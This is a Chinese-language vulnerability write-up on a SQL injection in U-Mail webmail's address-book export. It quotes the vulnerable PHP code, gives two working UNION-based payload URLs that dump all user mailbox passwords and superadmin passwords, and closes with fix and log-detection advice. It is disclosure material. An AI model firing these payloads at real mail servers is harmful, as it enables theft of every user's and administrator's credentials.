U-Mail邮件服务系统存在漏洞可获取所有用户密码

/client/cab/module/operates.php [php] getCategoryByDomainID( $domain_id, 0 ); $where = "domain_id='".$domain_id."'"; if ( $cate_id == "-1" ) { $cate_id = 0; } if ( $cate_id ) { $Tree = $CAB->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $cate_ids = $Tree->get_child_id( $cate_id ); $where .= " AND cate_id IN (".$cate_ids.")"; //直接带入了where in } $customer_list = $CAB->get_customer( array( "fields" => "*", "where" => $where, "debug" => 0 ) ); $cate_list = create_array $data_cache, "cate_id", "name" ); $string = "\"".el( "名称", "" )."\",\"".el( "邮箱", "" )."\",\"".el( "电话号码", "" )."\",\"".el( "分类", "" )."\",\"".el( "备注", "" )."\",\"".el( "生日", "" )."\",\"".el( "性别", "" )."\",\"".el( "单位电话", "" )."\",\"".el( "住宅电话", "" )."\",\"".el( "QQ", "" )."\",\"".el( "MSN", "" )."\"\n"; if ( $customer_list ) { foreach ( $customer_list as $user ) { $string .= "\"".$user['fullname']."\","; $string .= "\"".$user['pref_email']."\","; $string .= "\"".$user['pref_tel']."\","; $string .= "\"".$cate_list[$user['cate_id']]."\","; $string .= "\"".$user['remark']."\","; $string .= "\"".$user['birthday']."\","; $string .= "\"".$user['gender']."\","; $string .= "\"".$user['work_tel']."\","; $string .= "\"".$user['home_tel']."\","; $string .= "\"".$user['im_qq']."\","; $string .= "\"".$user['im_msn']."\","; $string .= "\r\n"; } } } if ( get_session( "language" ) == "zh" ) { $out_data = iconv( "UTF-8", "GBK", $string ); } else { $out_data = $string; } header( "Content-type: text/plain" ); header( "Content-Disposition: attachment; filename=Address.csv" ); header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" ); header( "Expires: 0" ); header( "Pragma: public" ); echo $out_data; exit( ); } ............... 
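?> [/php]

$where .= " AND cate_id IN (".$cate_ids.")"; 这一句把 $cate_ids 直接拼接进 SQL 的 IN (...) 子句后带入查询。$cate_ids 来自 get_child_id( $cate_id ),而 cate_id 是请求参数;在所示片段中,除了与 "-1" 比较之外,没有对它做整数校验或转义,因此构成 SQL 注入。

[php] http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,mailbox,5,6,password,8,9,10,11,12,13,14,15 from userlist%23 [/php]

超级管理员在 web_usr 这个表,同样可以一键脱下所有:

[php] http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,usr_name,5,6,password,8,9,10,11,12,13,14,15 from web_usr%23 [/php]

修复思路:cate_id 在使用前应强制转换为整数(例如 intval()),拼入 IN (...) 的每个 ID 都应确认是整数,或改用参数化查询。password 列若以明文或可逆方式存储,应改为加盐的单向哈希(如 password_hash())。排查时可在 Web 访问日志中检索 action=customer-export 且 cate_id 含非数字字符的请求。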
